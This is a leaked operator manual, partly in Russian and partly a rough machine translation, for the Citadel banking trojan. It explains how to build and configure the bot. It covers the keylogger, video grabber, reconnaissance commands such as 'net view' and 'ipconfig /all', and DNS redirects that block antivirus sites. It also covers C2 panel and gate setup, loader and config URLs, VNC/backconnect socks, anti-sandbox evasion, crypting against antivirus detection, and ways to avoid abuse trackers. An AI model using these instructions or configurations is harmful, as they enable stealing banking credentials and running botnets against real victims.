- Умное распознавание папок (они неотличимы от файлов)
- Кнопка сброса. Благодаря защите от повторного ифрейма аккаунты она не испортит :) Заигноренные акки сохраняются (т.е. тоже не испортятся)
- Выборочный игнор аккаунтов (не ифреймить ни за что). Отмеченные игнором аккаунты отображаются сутки и прячутся. Если сделать сброс — они останутся и повисят ещё сутки.
- Сортировка: последние события (найден, отправлен, обработан) в хронологическом порядке сверху
- рычаг ручного запуска (полностью ручной режим). Это делается с помощью кликов по заданиям вверху, если ифреймер в режиме "off"
Например: кликаешь первое, получаешь новые акки. Нужные заигнорил, кликаешь второе: они улетают на обработку.
Третье задание — сбор результатов — всегда отрабатывает само :)
********************************************************************************
==========================>>>>> Кейлоггер процессов
********************************************************************************
Для включения кейлоггера, в конфиге билдера прописываем новую секцию:
entry "Keylogger"
processes "calc.exe;*notepad*"
time 1
end
*notepad* поиск нужного процесса по имени
calc.exe точное название процесса
Здесь мы перечисляем список процессов, на которые мы устанавливаем кейлоггер.
Напомню, что кейлоггер по умолчанию включен для всех браузеров, поэтому пользуйтесь модулем, если вам необходимо отследить отдельно-взятые приложения.
time 1 указывает на время в минутах, сколько минут подряд, с момента запуска приложения записывать клавиши.
Секцию нужно прописать перед секцией entry "CmdList" или после нее.
Для поиска отчетов в админке, выбираем тип отчета: "Кейлоггер"
********************************************************************************
==========================>>>>> Фильтровая GeoIP защита ботнета
********************************************************************************
Для включения модуля, заходим в раздел "Параметры" в админке, там есть пункт "Разрешённые страны", ставим галочку для включения и отмечаем нужные страны.
Все страны, которые будут не отмечены вами, автоматически попадают в игнор-лист, однако, отчеты от них все равно будут писаться, но при запросе конфига через file.php и отсылки запросов на гейт, ботам будет выдаваться ошибка 404 на уровне HTTP-сервера (это можно проверить снифером)
Бюджетный вариант от абуз. Рекомендуется использовать только для маленьких узконаправленных VIP-ботнетах, с целью перевода ценных ботов на особый ботнет.
Если заметили сильную нагрузку на сервер, немедленно отключайте настройку.
********************************************************************************
==========================>>>>> Дубль-клинер логов
********************************************************************************
Для включения и отключения модуля, необходимо перейти в раздел "Параметры", подраздел Функции - "Дедупликация отчетов" включаем и отключаем.
Если заметили большую нагрузку на сервер, немедленно отключаем этот модуль в настройках.
********************************************************************************
==========================>>>>> Общая рекомендация и частые вопросы
********************************************************************************
Для избежания проблем на сервере со скриптами, рекомендуется устанавливать PHP 4.3
Если вы хотите швейцарскую гарантию от реверса, вскрытия файлов на сервере, 100% защиты от трекеров и любых недугов, рекомендуем вам установить привязку на вашем сервере на страну, по которой вы работаете.
К примеру все ваши файлы по http будут доступны только юзерам, зашедшим с Испании, остальным, с других стран будет выдаваться 404.
Сделать это можно при помощи GeoIP модуля на сервер nginx, либо установить привязку на DNS.
Если интересно, можем дать команды хороших админов, кто может помочь в этом вопросе.
Как это сделать и советы по защите ботнета, вы можете ознакомиться в статье в "База знаний" внутри СРМ.
Также, хотим обратить внимание на то, что софт НЕ будет работать совместно с Proxifier'ом !
Если вы тестируете на виртуалке или у себя, обратите внимание чтобы у вас не было в системе русской или украинской раслкадки - иначе работать ничего не будет.
Также, вполне вероятны сбои на х64 - на система софт срабатывает корректно 50 / 50
Для просмотра видео в админке в онлайн-плеере нужно использовать Opera (насчет других браузеров хз как, пробуйте). У себя можно посмотреть через плеер VLC.
Теперь рекомендация криптерам по крипту Citadel:
- пеедавать адрес тело через GetModuleHandle с параметром NULL
- сохранять тело(целостность секций)
- сохранять оверлей
Инжекты полностью совместимы с зевсоформатом.
Не забудьте отключить антиэмулятор в конфиге, который задается опцией antiemulation_enable 1/0 (1 - включено, 0 - выключить).
Если опция включена, софт не будет работать на VMware, вместо этого софт будет генерировать кучу фейк-запросов на несуществующие домены, чтобы ввести в заблуждение автоматические ханипоты и реверсеров. Не пугайтесь этого :) Все запросы поддельные.
Если не знаете что такое антиэмулятор, посмотрите в самом начале анонос новостей.
Пароль на пришедшие в логи сертификаты: pass
Если испытываете проблемы с нагрузкой на сервер(админка еле грузится) попробуйте увеличить значение key_buffer в 2 раза больше (к примеру 512M) в конфиге MySQL (my.cnf)
Еще хотим обратить внимание на параметры в конфиге,
например параметр timer_config 1 5
timer_config [number1] [number2]
Определяет интервал времени в минутах, через которое бот обновляет с сервера конфиг.
[number1] - интервал в минутах, действующий в случае успешной загрузки конфига в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной загрузки конфига в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться обновить конфиг через указанный промежуток времени)
timer_logs [number1] [number2]
Определяет интервал времени в минутах, через которое бот отправляет накопленные логи.
[number1] - интервал в минутах, действующий в случае успешной отправки логов на сервер в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной отправки логов на сервер в прошлый раз. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться отправить накопленные и накапливаемые далее логи через указанный промежуток времени)
timer_stats [number1] [number2]
Определяет интервал времени в минутах, через которое бот отстукивает в админку и получает из нее команды.
Из этих данные админка анализирует нахождение бота в онлайн, а также при каждом отстуке отправляет новые имеющиеся команды,
например, на открытие сокса.
[number1] - интервал в минутах, действующий в случае успешного соединения с админкой.
[number2] - интервал в минутах, действующий в случае неудачного соединения с админкой. (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться достучаться до админки через указанный промежуток времени)
timer_modules [number1] [number2]
Определяет интервал времени в минутах, через которое бот обновляет с сервера модули, например, видеомодуль.
[number1] - интервал в минутах, действующий в случае успешной загрузки видеомодуля в прошлый раз.
[number2] - интервал в минутах, действующий в случае неудачной загрузки видеомодуля в прошлый раз (например в случае временной недоступности сервера или иными проблемами со связью, бот будет пытаться загрузить видеомодуля через указанный промежуток времени)
timer_autoupdate [number1]
Определяет интервал времени в часах, при котором бот будет обновлять EXE с новым криптом.
[*]Что значит Unknown в статистике фаерволлов/антивирусов на pie-chart'e ? Это значит, что на ПК не стоит ни антивирус, ни фаерволл.
[*] ВАЖНОЕ ЗАМЕЧАНИЕ ПО КОМАНДАМ: ЕСЛИ ВЫ ДАЕТЕ КАКУЮ-ТО КОМАНДУ ЧЕРЕЗ РАЗДЕЛ СКРИПТЫ И УКАЗЫВАЕТЕ ВЫПОЛНЕНИЕ КОМАНДЫ НА ОПРЕДЕЛЕННУЮ СТРАНУ, НАПРИМЕР "US", ТО ОБЯЗАТЕЛЬНО ВКЛЮЧЕНИЕ В РАЗДЕЛЕ "ПАРАМЕТРЫ" ОПЦИИ "GeoIP по каждому отчёту (только небольшие ботнеты)"
------------------------------------------------------------------------------------------- Personal Manual - Google Translatel (Pastebin)
-------------------------------------------------------------------------------------------
Version 1.3.4.5
Manual Version: 2.0 (last updated 06/06/2012)
List of new features for the bot:
[+] Fixed a bug in the VNC Vista / Windows 7. Now we can fully work with Internet Explorer 8 (remember, there was a problem with the rendering of IE)
[+] Support for Mozilla Firefox 7.0 (fixed an issue where not sent reports to the latest versions of the browser)
[+] Crypto-protection (body decrypted in memory).
[+] Redirects DNS (not through the hosts). You can block / redirect any URLs without fear that they will notice heuristics. For example AV-block or redirect servers are pagu bank to another host.
! BONUS! List URLs of popular anti-virus software to block comes.
[+] Version information in the report sotfa. Will send you a detailed version of the browser Holder together with the report. It helps in simulated settings Holder.
[+] Extra level of protection for the server on trackers - Login Key.
[+] Mechanism autintefikatsii boot config (no direct URLs.) It gives full protection from the established trackers.
[+] Support grabber Google Chrome. [Tested on the latest 15.x/16.x/17.x].
[+] Support injector Google Chrome. [Tested on the latest 15.x/16.x/17.x].
[+} Added caching of search functions, which speeds up the installation of hooks Chrome.
[+] Added ability to execute system commands CMD at the start of the bot (section CMDList) sending a report to the server. For example, you need to for installs, the team went a result of "ipconfig / all", or a list of all available ball. It is useful in analyzing the internal structure of companies. (For example, often come across bots in LAN with the names of ACCOUNTANT_PC, POS_SERV, DATABASE ...)
[+] Added a mechanism to verify the safety hooks on some Windows.
[+] Heuristic analysis environment a sheet with a stop to unwanted software (greatly increases stealth), included all the popular anti-virus software.
[+] Fixed minor bugs.
[+] Video Grabber. A unique opportunity to monitor the work of your injector "eyes holder" in the config file specifies a list of sites and the length of video recording in seconds, at call on a given link is activated video recording format. Mkv. It is recommended to configure your server to receive files 60 MB 10.
[+] Removed the delete cookies when installs, considering it knocks "fingerprint" when working with Holder bays.
[+] Added support for HTTP 1.0 and the extended headers (eg responz not always look like "HTTP/1.1 200 OK", is "HTTP/1.1 200 follow document", in this case, after the code is 200 more words) applies to browsers Firexfox & Chrome
[+] Added a gate generator (in case you want your files to an intermediate host for a round-trip).
[+] Completely redone encrypt (data, record logs / video, download configs, etc) in the Citadel, to replace the outdated RC4 used in Zeus, came to AES 128. Recall that gave asechku RC4, when mass produced were different decryptors config / injector for Zeus, and the hosts began to palitsya abuse.ch.
Now, in addition to the built-RC4, which is encrypted with your personal signature, the software is also built-in AES encryption, the output we get the AES128 secure handling bot <-> gate. No ZeusDecryptor'y (ThreatExpert) and automate reversing will not interfere with your comfort in the moment (Jan 2012).
[+] All the basic functionality, the remainder is present from Zeus. I think you should not write it here again.
[+] Fixed a bug report IN records from Web-filters in the configuration with the "!" (Neglect), which was to exclude all references given, and instead did the opposite and write to a log.
[+] Added new option in the filter config-file, and it is a function to send or not send the cookies on the server.
Option static config disable_cookies 0/1 indicates whether to disable grabbing cookies (1 - disable 0 - enable).
Manual, also, cookies may be obtained from the admin team user_cookies_get, if you really need.
[+] Added the function of any open page deflotovym user's browser on the boat.
For example, if you want to cheat any counter or statistics on voting or want to dop.dohod with your botnet shopami opening page (as well as: pharmaceutical, gambling, drop-projects, etc.). A great way to advertise the necessary Page!
A new option url_open <url>
[+] New type of filter WebFilters in the configuration file in the assembly.
Two new parameters: P and G.
Parameter P is given to the link points to a record only POST requests (all others are ignored), with this link.
The parameter G indicates the recording just GET requests (all others are ignored) with the given link.
Parameters can not be combined, ie should indicate any one of them.
[+] Added a modular software system that gives us:
* Scalability and load any operating functional bot-oriented for the Citadel.
All modules are loaded from the server and dynamically decompressed in memory, which eliminates their detection.
Storage and transfer to the outside world only in encrypted form.
The modules are loaded in a process of trust, so weighty save memory.
Great handling - modules can be disabled via the config.
[+] Video Grabber remade on a modular basis. Now the weight of the build nekriptovannogo <190 kb. Always.
[+] Added new option timer_modules (timings for loading modules).
[+] Added support for new Google Chrome browser 17, and fixed a bug with handling Flash'a in it.
[+] Added support for macros. Introduced macros:% BOTID%,% BOTNET%
* Can be inserted into any part of the injector macro data and upload to your server (AS / injected), transferred the name of the boat and the name of a botnet.
[+] Added commands four modules (on / off, Disable / enable the download.)
[+] Added new option disable_httpgrabber 1/0 for Chrome: eliminates the handling of conventional HTTP (not HTTPS) requests.
[+] Added a full account in the User-Agent reports HTTP (S) grabber allows cloning holdersky UserAgent through any type of utility CCTools.
[+] Added an entry screen resolution reports HTTP (S) grabber, an example of "Screen (w: h): 1600:900" - useful when cloning settings Holder, many banks are paying attention.
[+] Changed the protocol to send video files to reduce load on the server (some have had problems with the load on the server and it is strongly inhibited)
[+] Added ability to send jabber-notifications to multiple recipients in admin Citadel.
[+] Added ability to specify multiple url_config'ov (the way to the main config file), used to be this: if you have the basic configuration is not available at the time installs a bot, then the backup can not be downloaded, and now this problem will not be trying to pull off and the bot config from another URL'a (You can enter up to 20 reserve).
[+] Fixed a bug in Google Chrome (17x) leads to a sub-hang, when you open multiple tabs with injected.
[+] Added new command:
- Getting information about installed software (the list - the company | product | version) on your computer: info_get_firewall
- Getting information about the installed antivirus on your computer: info_get_antivirus
- Getting information about the installed firewall on your computer: info_get_firewall
The information comes as a separate report for each bot. Soon integrate the bulk statistics of the installed software in admin Citadel.
[+] The algorithm for a number of antiemulyatsii AB (not considered kriptor, software has become invisible for a few proaktivok).
[+] Fixed a problem running as SYSTEM.
[+] Added Jabber-specific notifications upon detection of bots specified by mask (eg a mask * corporate *, will look botid with such a coincidence), even if they did not send any log files, the script will notify you in Jabber-communication about the appearance of a bot . Now you do not miss the eye past the security bots.
[+] The admin has a new section of "Efficiency and Security", we had integrated with the service scan4you, and now you can one-click check all of your executables builds at once in the admin palevnost Citadel, well, you can set automatic scan every file day, and if one of your files by more than third palitsya antivirus, you will immediately receive a notification in your Jabber, so you can
immediately replace the exe file. Now, the mechanism will work for you automatically, too lazy to health!
[+] Some customers have complained that only 40% of bots to the new updated version of the exe, the rest can not upgrade for some unknown reason. Indeed, the bug was from the time of Zeus, we have investigated and corrected. Now, a new parameter in the config file: timer_autoupdate 8
In which set the time (in hours), how often to download exe file and restart the server (RC4 key must match). 80% of the bots are now updated successfully, and the crypt perezalivat exe, survival increased by 37.1%, your bots will have the most fresh and clean build.
[+] Changed the system to send reports to a server in previous versions of each report, place the unit sends a POST request to the gate, in the new scheme, reports are sent a pack of a few pieces, it allows to minimize the number of sessions on the server and the server load is minimal, to withstand a large number of bots online.
[+] Video format from bots changed to. Webm (HTML5), we have built online video player admin Citadel, now you can watch videos right in your brauezere (recommended Opera). Of the possibilities: Fast назад-вперед/фулл-скрин/поиск video BotID, IP-address, date.
But that was not enough and we went on, many of you use (it is time to use and develop all industries combined) AZ and personal admin for injector / akkov collection, etc. Would you like from your admin to watch over the bay, or how you inject on the boat? It's easy! We created the API-system, you can now send BotID or IP-address of the script, and the API will return to you ready to code HTML-embed all the videos on the bot and you can insert and watch at least a narod.ru, without going to the admin Citadel.
[+] Added a handy parser parser system commands (CMDList) in the control panel, you can now see the new format as a table, the results of the system commands such as: ipconfig, a list of PCs on a LAN, a list of processes, etc.
[+] Now when you install the build on the bot will automatically be sent to the one-time admin cleduschaya information: installed firewalls, antivirus software installed, installed programs.
You can look for a particular boat, and for the entire botnet. We have created a separate section, where you can see all the statistics in the form of visual graphics and calculations. Now you know whom to fight.
[+] Added ability to "Selected logs", you can tag any interesting account (account) when searching for data in the admin and then easily find it unnecessarily, he will be allocated a different color.
[+] Implemented injector compatible with UTF-8 (now injected, you can insert any of the languages such as Japanese, Chinese, etc.)
[+] A crypt in the admin panel Citadel. This section in the admin panel that allows you to update the bot exe file directly from the web. At any time, you can redownload the right exe file and boots it will download in a timely manner. History is in the format of downloads: File | Date Downloads | Paid (Y / N)
Regarding the latter point, we divided the powers and created a separate category of users with "kriptera" - these users have access to your panel as you wish, and the only privilege of the user - the ability to update the exe file, and you can mark in the table, paid concrete crypts or not.
You can enable jabber-notification of result checking scan4you.
[+] Added full-screen screenshots (option in the config file - "@ @").
[+] Improved avtoapdeytinga: If you are faced with a big load on the server when you upgrade (or bots do not move to the new admin panel), this fix corrects this situation. Fix includes:
- Old report from the previous version are removed during the upgrade exe (tmp file), an additional safety net.
- Heavy Records (video and other file report) further validated and removed in case of problems (for example, if the file already downloaded)
- Changed the initialization apdeytinga, resulting in isklchyuchen deadloc and the opportunity to further update when a file system error.
[+] Fixed the problem of garbage in the admin log: Logging removed completely Flash-movies (swf / flv) from logs and the whole Facebook, because a lot of trash talking from them.
[+] Module "Qualitative test WebSocks" is now built into the admin panel, no extra scripts. Shows: country, state, city, hostname, uptime and ping lag.
Ability to enter this section without a password, for convenience when you need urgent Sox smile.gif
[+] Module "log parser" is now built into the admin panel, no extra scripts. The interface is much improved, the ability to create "the chosen domain," "archive logs" and the ability to parse https or http domain names to choose from. Builds up a visual table of all domain names that appear in the logs.
[+] Added "Notes" in the admin Citadel, something like a online notepad. Admin interface is adapted for tablets iPad / Galaxy Tab.
[+] Improved module "VNC-admin panel", now it is built directly into the admin Citadel, no extra scripts. All set to 1 click. Many new features, namely:
- Ability to work with the API, you pass BotID or IP-address of the script, for example through the inject, and it sets the VNC / BackConnect Socks-connection by sending data to connect you with Jabber. You can call the script at any time, apply to AZ.
- Instead of each report in the "Database Search" appeared four buttons: "Add to Favorites", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC when this option is enabled, the bot will install vnc-connection at each resume online, unless you disable it.
- AutoConnect BC Socks when this option is enabled, the bot will set backconnect socks connection for each output in the online, the other options provide one-time connection.
- Now you can automatically generate VNC / BC SOCKS-connection as soon as the boat came from the right account for URL-mask, parse hotcakes.
- Next to each account for URL-mask write date of last entry in this ACC (last login), you no longer need to check on the activity of accounts - for you it will make scripts.
- Ability of any notice of a few Jabber'ov immediately.
[+] Fixed problem with chain hooks in Chrome.
[+] When you start user_execute with the flag "-f" to force is put only apdeytinga exe and will not be run as a installer.
[+] Optimized work gate, thus reducing the load. Simplifying admin installer that allows you to install all modules in one click.
[+] Added support for new version of Chrome 18 [injected / formgrabbing]
[+] Added button "All reports bot" in the admin, you can view the beginning and end of the reporting on the specific bot.
[+] Fixed a bug with manual command dns_filter_add, blocking URLs are now working correctly.
[+] Fixed bug with display of exe files on the main page, now deleted exe disappear automatically.
[+] Fixed a bug with the work of the Task Scheduler scan4you, a daily check of the exe file is working correctly.
[+] Added a unified system of CRON-one cron-job runs all tasks now: jabber-notice inspection of files, work units, etc.
[+] Added ability to delete a video from admin.
[+] Added a reference to the notes in Jabber bot in the VNC-module.
[+] Updated GeoIP database (late 2011).
[+] Last of the domain AdvancedConfigs triggered with a delay, is made in order to protect your backup URLs from automatically grabbing hanipotami.
[+] Fixed a script in the zip archive data in the admin (fsarc.php)
[+] Settings Jabber-account and all parameters are now made in the general settings.
[+] Now you can specify the path in the config file with httpS :/ / (unsigned certificates held)
[+] Fixed case-sensitivity to inject now <BODY> and <body> the same entity. All injected insensitive.
[+] Completely redesigned interface web admin, user-friendly.
[+] Added online preview screenshots from the admin. Screens are arranged in series in order of appearance, it is easy to switch back and forth keys are sorted. There is no point to download more pictures and watch one. Virtual Keyboard / pages can be seen consistently.
[+] Added otstuk history, you can view your stats otstuk botnet (the active, total, percentage) for a week, fortnight or month.
[+] Added the version history of software, you can see statistics on the Citadel updates in your botnet. Will you know how many bots taken over to the new version, and how much is left on the old. Draw a diagram.
[+] Ability to search log, only bots that are online.
[+] Ability to search across multiple logs of keywords at once, and they can be saved as an alias and not when you next enter the search again, simply choose from the list.
[+] Added button "Cookies" in the context menu on the bot, which allows for the rapid withdrawal of all Cookies bot, if you do not cut off. Saves time.
[+] Integrated functionality to export FTP-accounts in the API, useful if you are using a third-party software-class FTP-Iframer, allows us to derive a plain-text/xml/php format ftp-acca on the date.
[+] Added button "Whois" to view the report, one click lets get all the information on the IP-address of the report.
[+] Added a comment to the bot when viewing the report, as well as the time when the boat was last online.
[+] Created a new section "Selected Records", which allows you to save a quick link to the desired report + nimu comment. For example, if you come across an interesting account, click "Add to Favorites" and a report will be displayed in a separate section, with automatic data Whois'om your comment. Keep acca on the spot.
[+] Added antiemulyator, which allows you to protect your botnet on the reversing and getting into trackers. When you start, build a detective that he was running in a virtual machine or a sandbox CWSandbox, VMware, Virtualbox, Sandbox, he starts to behave differently and your botnet go unnoticed. Details were not disclosed, tk's announcement is in the Public and the technology is very tricky.
Of the minuses: can not test the work in Vmware, have to do it on a real PC or Dedik. The option is moved to the config. antiemulation_enable 0/1
[+] Added Bot status "Online / Offline" when viewing the report.
[+] One of the most important features: Preview report in the search logs. No need to open more than 200 windows in your browser to view each report, and each link. Now you can easily click on a preview to make a report, and if the report will be of interest, then view the full version.
Supported by the rapid switching between reports keys back and forth-ESC.
[+] Updated cronjob script cleanup of old scripts (commands). Now everyone has to work without bugs.
[+] Added context menu option "Screenshots bot"
[+] Module VNC-admin: added sorting by date of last connection / OS (for example, if you only need to WinXP).
[+] Module log parser: added sorting by domain / number of reports in descending order.
[+] FTP-module ifreymer: Fixed bug with "smart" ifreymingom when the quotes in the code iframe-screened. The current owners are encouraged perezalit script pad.
[+] Since the previous encryption algorithm has been hacked a few months later, because of this, some customers got into ZeusTracker. We have developed and implemented a new encryption algorithm based on modified RC4. In cryptography uses a special key known only to the client. that requires its presence for decryption. Because each client's own indvidualny key, now from one client will not suffer all the rest. If you got one, others will be protected from this. Now we are completely isolated from the automatic analysis builds. As a result, we obtain the two-level authorization, protection from the boat trackers.
[+] Did cropping options X-Frame-Options in Header'ah, unnecessarily, it may interfere with some inzhekta work.
[+] Be done to correct formgrabbinga / inzhektinga in Chrome 19 (19.0.1084.52m)
[+] Works faster on large botnets admin.interfeysa + gate expense of functional optimization GeoIP-database.
-------------------------------------------------- --------------------------
UNDERSTANDING TO SIMPLIFY THE INFORMATION, YOU CAN SKIP SECTIONS
Where is the INSTALLATION AND USE OF UNITS THAT you do not get
USE CTRL + F to search for key words and definitions.
EXAMPLE OF ADEQUATE TIME UNDERSTANDING OF ALL FUNCTIONS SOFT - 1 WEEK.
-------------------------------------------------- --------------------------
1) Access to CRM
http://citadelmovement.com/crm/
First citadel; rightway
then
Login: XXXXXXXXXXXXX
Password: XXXXXXXXXXXXX
What is Citadel CRM Store?
It is a system of interaction between our customers and the developer.
Perhaps you are familiar with the situation where a support product ignore your request to icq / jabber 'e - this contributes to a high load of the person who is responsible for all this because a lot of customers, and he is one, but still busy with chores.
With us, this problem is not relevant. Especially for you has developed a system through which you can immediately report a bug in software, and we, in turn, it quickly fixed a, if any. All requests received more than one person at a time, with notices of jabber / sms. You quickly get a response within the ticket system.
Do you have a great idea to finalize the software and you want to share it with the developer (even if it's even the smallest idea: for example you do not like the icon in the menu) - we're going to meet you.
You can create two types of applications (see projects) within the CRM:
a) Public Bid - a bid to the topic description + (better put TK), which will see all clients, they can discuss it in the comments, offer good value for money for the implementation of and to vote: do this application or send it to the trash.
You can create these types of applications, and can vote and do any act in relation to other requests of our customers.
b) The private bid - if you want to offer our developers indvidualnuyu problem and a good price for the implementation, this type of application for you. It can only see the developers (ie us) and you. If all conditions are satisfied both sides, this module only get you.
All topical application, you can see in the "discussion on"
The right to vote has 4 meanings:
We need, I get
Useful, but I do not need
Absolutely not needed
No need, I do not possess
Please, if you see a new application - vote for it, even if you do not need it! We have a very narrow range, so it is YOUR opinion is crucial by for ALL, do not stay on the sidelines.
Any developments within the CRM (solutions, applications, comments) you will be notified by jabber-bot channel. This is done for your convenience, so you do not refresh the page every time. But still, it is useful to go every 3 days in SRM'ku =) The faster voice and opinions are - so speedily develop our product.
If the application is gaining a lot of abandoned votes, it goes to the "Application Rejected" and closes.
If the application is approved by the developers, it goes to the "Under Construction"
For each application in this section, we make changes to the format of date - what has been done
So you can see the process of working on the module.
Do not forget to specify the desired advertised price per module, for which you would have appreciated the improvement.
All the news we publish in the "News" section, if you do not come to notice in Jabber, please report it immediately to our support!
You go once every 3-4 days in the CPM and check the news and comments on the request.
2) A list of useful links that will help you:
1) VMWare Workstation 6.5.0 + VMWare Tools + Crack:
http://www.citadelmovement.com/software/VMware-workstation-6.5.0-118166.exe
2) The image of the English-language Windows XP SP3 (Corporate Edition):
http://www.citadelmovement.com/software/Microsoft_C2AE_Windows_XP_SP3_Corporate.iso
Key: MXDJT-W3TCG-2KGQH-YPMK3-F6CDG
3) Development Kit to create an injector + examples (author unknown):
http://www.citadelmovement.com/software/injects_development.zip
3) Install Citadel
Folders:
builder - Builder Kit
backconnect - Download BackConnect VNC admin, namely, php scripts for Backconnect Windows server.
webserver (either server [php] - admin panel, gate
************************************************** ******************************
========================== >>>>> Step-By-Step Installation Citadel
************************************************** ******************************
********************
Requirements for the >>>>>>>>>> server.
********************
PHP> 5.3, Mysql 5 (preferably the latest version)
cron, apache. At the request of nginx and control panel cPanel or DirectAdmin.
+ Windows VPS if purchased VNC admin (on the module below)
********************
Step 1 >>>>>>>>>>
********************
When you start builder.exe, will be a line
Authorization key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
This is your key to indvidualny protection trackers (we call it even LOGIN KEY)
It must be placed in the file webserver / system / global.php, which contains the line
define ('BO_LOGIN_KEY', 'PUT_KEY_HERE');
Insert the key here, ie obtained
define ('BO_LOGIN_KEY', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
THIS VERY CAREFULLY CHECKING THE MOMENT! 80% of Fit Clients simply forget HERE YOUR KEY FROM Builder AND SO IN GLOBAL.PHP BOT does not knock in the Admin. Check this MOMENT PLEASE! If a key already entered, then everything is OK.
Then set chmod 777 on the folder:
system
system / data
Also, it is necessary to put before setting chmod 777 on the entire folder webserver, after a complete installation - the right to return the folder to chmod 755
Following these above actions, I've found open webserver / api.php
and change the line define ('API_TOKEN_KEY', 'changethispassword');
for any random password, for example define ('API_TOKEN_KEY', 'dgwd23gwegw');
This is necessary so that you are protected from hacking and you are not compromised through the script API, deflotovy change your password.
********************
Step 2: >>>>>>>>>>
********************
We go to http://www.htaccesstools.com/htpasswd-generator/
Enter any name and password is issued a line of type a: $ apr1 $ HE / llFvK $ u3YAEGm277SkotywpTl9w /
Save this one line in the file. Htpasswd in the webserver directory
After that, create a new one. Htaccess file in the directory webserver
There we write:
<Files Cp.php>
AuthName "Your ID"
AuthType Basic
AuthUserFile / put / do / faila / .htpasswd
require valid-user
</ Files>
Where / put / do / faila / .htpasswd - replace to your unix-end path.
Now, when entering the admin cp.php, additional protection is a pair of login and password.
You can do things differently and not to create. Htpasswd, but simply to create a. Htaccess file and write there a line:
<Files Cp.php>
Order Deny, Allow
Deny from all
Allow from 111.111.106.111
</ Files>
Where 111.111.106.111 - your constant IP, now the admin panel will be available only from your IP.
Which way you prefer - you choose.
********************
Step 3: >>>>>>>>>>
********************
Open the file config.txt and consider new options inherited from the old versions of Zeus remained the same, so we will not dwell on them attention.
entry "Video"
a quality
length 60
end
Section for setting videograbbera: length the length of each video in seconds is recommended that no more than 10 minutes (600 seconds) formed a very weighty because the patched files.
Quality - from 1 to 5, the video quality. It is recommended to keep a default, to save on the amount of video files.
Video recording is triggered when approaching the desired link and we removed exactly length-seconds.
To specify that we need to take a mask, go to the section entry "WebFilters"
"# * Paypal.com / *"
# symbol in front of the mask is activated recording.
The section is very thin, because quite a heavy load on the server, specify the exact how to mask and only the very links you need (for example bank.akki)
It is recommended to configure the server apache & php - for receiving files over 50 MB via POST.
Guide to setting up a server is here # http://jdownloads.ru/faq/8-how-uploadbigfiles.html
Test your attentively surveying the video is NOT a virtual machine, unnecessarily due to lack of correct ones, may be such that on virtualke will not shoot video.
Videos are added to the format. Webm, in a folder _reports / * BOTNAME * / videos /
They can be found by searching for files in the admin, or browse through the online player (section "View Video"). It is recommended to view in Opera and Firefox, other browsers are not tested.
entry "CmdList"
"Hostname"
"Net view"
"Ipconfig / all"
end
A list of system commands that the bot will perform for the first time on a running system, and send to the admin panel.
In the admin, you can find the commands as a result of the type of report, "The result of CMD-command"
With him will be a list: the bot - the result of command execution
in a convenient format (Section CMD-Parser)
encryption_key "key"
Be sure to ask here a random key, this key is also known as RC4 Encryption Key - you have to ask the admin to install the uninstaller, you can change it in Settings. It should not be too complicated or too simple, identical in configuration and admin. Not recommended to put more than 10 characters! You should use lower case and special symbols!
entry "DnsFilters"
"Microsoft.com = 127.0.0.1"
"Myspace.com = 127.0.0.1"
"Gruposantander.es = 127.0.0.1"
end
Ability to create a DNS-redirect or block the AV-server, or an unwanted URL (for example, if you find that downloading the logs go to someone else and need someone to block the gate).
Specifies the IP-address for the redirect.
DNS Redirect does not work for browsers, but for all software, which will be knocking at this domain. All these requests will be redirected to your IP.
Now it is important! The resulting config BUILD, exe file and video.modulya (to create it, you press the button Assemble modules), we put in a folder webserver / files /
As a result, we get 3 files in the folder files. Config video.modul, exe file. Do not forget to zakriptovany exe file before placing it in the folder, otherwise it will be such that the timer auto-update, the bots will start downloading the exe, which palitsya.
url_config1 "http://localhost/file.php|file=test_config.bin"
Specify here test_config.bin - the name of our config, we have filled in the files / taking into account where the file file.php (as it lies above the folder files). The symbol | you should not confuse, it is here specifically.
url_config1 must be specified, you can also write multiple backup config URLs, in case the first domain while you sleep went to Down, unnecessarily bots will not reach your config if you will not be able to download the basic configuration.
In this case, write another line under the url_config1:
url_config2 "http://localhost/file.php|file=test_config.bin"
Is optional. But there can specify up to 20 backup configs, the bot will turn to knock on each of the URLs have not yet set a config file. In the last url_config bot knocking delayed 5 hours, this is done to protect against automatic parsing URLs reverser.
url_loader "http://localhost/file.php|file=test_bot.exe"
test_bot.exe - here indicate the name of the exe file, which is in the folder files /
Do not rename the file file.php, leave with the same name. Way do file.php, directory files / lies next to the file.
url_server "http://localhost/gate.php"
It points the way to gate.php
The rest is configured as Zeus, if you forgot to format, read the manual from Zeus zeus_old.txt
With the advent of version 1.3.0.0 shall appear the need to collect the modules (eg videograbber) to build, unnecessarily bots will pump out the necessary modules from your server.
Therefore, after the assembled exe, click the button "New Modules" and upload the resulting file / files to the webserver \ files on the server. This is done MUST! EVEN IF YOU DO NOT USE VIDEO.MODUL! AKA BOT WILL NOT knock on the admin.
Once we have uploaded the files in the files, and filled the whole folder as a whole created a webserver + database.
Go to the address: http://www.vash-host.com/citadel/install
And we enter all the values, then delete the directory install.
************************************************** ******************************
Installation ========================== >>>>> BackConnect Windows Server (required for operation of VNC-admin)
************************************************** ******************************
To install the server side, you need a Windows VPS / Dedicated preferably XP, 2003,2008
We put the web server XAMPP / WAMP, or any other supporting PHP. Turning off UAC + Windows Firewall, so you can open the ports. Also disable the domain policy and come out completely from any domain.
Fill in the web directory scripts set backconnect \ winserv_php_gate
Web admin panel will address: http://ip-serv/control.html
It will log on the VNC connect.
Possible problems: because vindovyh firewall, check this point carefully. Do not forget to restart Windows after disabling firewall.
All scripts must lie at the root of the server, not to create any folders.
If you do not know how to put XAMPP, that's Manual: http://www.ripecms.com/documentation/articles/installing-apache-php
************************************************** ******************************
Installation ========================== >>>>> Citadel VNC Admin
************************************************** ******************************
If you purchased the module VNC-admin, then in your panel will be available to the section "VNC".
Go over the options with which it can be difficult.
To get started, you have to press the "Configuration" and write there IP-address Windows-server where you have already filled scripts backconnect'a. No way do not just IP-address.
What is different from the Connect avtokonnekt?
